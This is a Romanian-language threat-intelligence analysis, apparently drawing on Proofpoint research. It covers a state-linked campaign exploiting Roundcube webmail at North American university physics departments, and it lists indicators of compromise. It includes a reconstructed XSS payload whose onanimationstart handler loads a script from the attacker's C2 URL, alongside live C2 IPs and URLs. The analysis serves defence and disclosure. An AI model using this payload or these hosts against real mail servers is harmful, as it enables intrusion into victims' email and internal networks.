Un singur e-mail deschis, un întreg server cedat
Din mai 2026, actorul statal UNK_MassTraction exploatează n-day-uri în serverele de mail Roundcube ale departamentelor de fizică din universități nord-americane. Nu este o scurgere de date convențională (atacul folosește browserul victimei drept pivot pentru a injecta implanturi în memorie).
Notă de analiză: UNK_MassTraction indică grupuri de activitate în dezvoltare, nesuficient monitorizate pentru o clasificare numerică oficială de tip TA.
Coordonatele atacului
Ce știm sigur
Campania vizează cadre universitare și administratori din departamente de astrofizică și fizica particulelor, cu legături în securitatea națională. Atacatorul folosește domenii compromise sau vulnerabile la spoofing din cauza politicilor DMARC laxe.
Ce rămâne incert
Nu se cunoaște numărul total de universități afectate din afara radarului de monitorizare. Scopul pe termen lung depășește furtul de e-mailuri (atacatorii folosesc serverele compromise ca noduri de rețea pentru a penetra adânc în rețelele interne).
De ce contează
Infiltrarea demonstrează că serverele de webmail expuse sunt tratate ca echipamente de margine (asemănătoare concentratoarelor VPN). Compromiterea lor nu este blocată de scanerele AI clasice din cauza payload-urilor stocate în memorie.
Lanțul de exploatare (Faza Browser vs. Server)
Urmărește mecanica atacului pas cu pas. Fiecare stadiu reprezintă o trecere de la acțiunile efemere din browserul clientului la un backdoor persistent pe server.
Browser Space (Client)
Server Space (Roundcube)
Acțiune & Impact
Un e-mail malițios cu cod HTML special conceput este trimis către victimă. Când e-mailul este deschis în clientul webmail Roundcube, lipsa igienizării tagurilor HTML permite rularea de cod JavaScript arbitrar prin evenimentul onanimationstart.
Cod Sursă / Payload Reconstruit
<div style="animation: xss 0s;" onanimationstart="
let script = document.createElement('script');
script.src = 'https://45.150.109.151.sslip.io:23088/app/js/jquery.min.js';
document.body.appendChild(script);
"></div>
Remediere Arhitecturală
Cum ascunde atacul urmele
IceCube nu se bazează pe o sesiune de browser deschisă nelimitat. Acesta monitorizează comportamentul utilizatorului și folosește evenimentele browserului pentru a relansa exploit-uri și a șterge urmele.
Starea Monitorului de Activitate
Semnătură AI vs. Securitate prin Arhitectură
Metodele clasice bazate pe scanarea fișierelor sau pe reguli simple de inteligență artificială eșuează în fața elementelor rulate doar în memorie. Vezi cum se compară mecanismele defensive în fiecare punct critic al atacului.
Eficacitate pe Etapele Atacului
Indicatori de compromitere (IoC)
| Indicator | Tip | Descriere | Prima Observare |
|---|---|---|---|
| 45.150.109.151 | IP Address | Server de livrare payload-uri IceCube și server de Comandă și Control (C&C) | Mai 2026 |
| 194.213.18.133 | IP Address | Server de livrare payload-uri IceCube și server de Comandă și Control (C&C) | Iunie 2026 |
| 45.86.229.111 | IP Address | Server de Comandă și Control (C&C) utilizat pentru backdoor-ul VShell | Iunie 2026 |
| https://45.150.109.151.sslip.io:23088/app/js/jquery.min.js | URL | URL utilizat pentru încărcarea loaderului JavaScript IceCube | Mai 2026 |
| https://194.213.18.133.sslip.io:23088/app/js/jquery.min.js | URL | URL utilizat pentru încărcarea loaderului JavaScript IceCube | Iunie 2026 |
| http://45.86.229.111/slw:8080 | URL | Adresă de descărcare a loaderului VShell (SNOWLIGHT) | Iunie 2026 |
| a02f124c5ce4180bd130a62ee03262f399c33491de3aed36e0b15155ae4926c0 | SHA256 | Codul hash SHA256 al loaderului malițios de browser IceCube | Iunie 2026 |
Surse de documentare
Statut juridic și editorial: Această analiză tratează materialul Proofpoint drept document primar de cercetare. Detaliile tehnice ale exploit-urilor CVE-2024-42009 și CVE-2025-49113 sunt incluse cu scop didactic și ilustrativ. Denumirile și indicatorii sunt conforme cu investigația originală.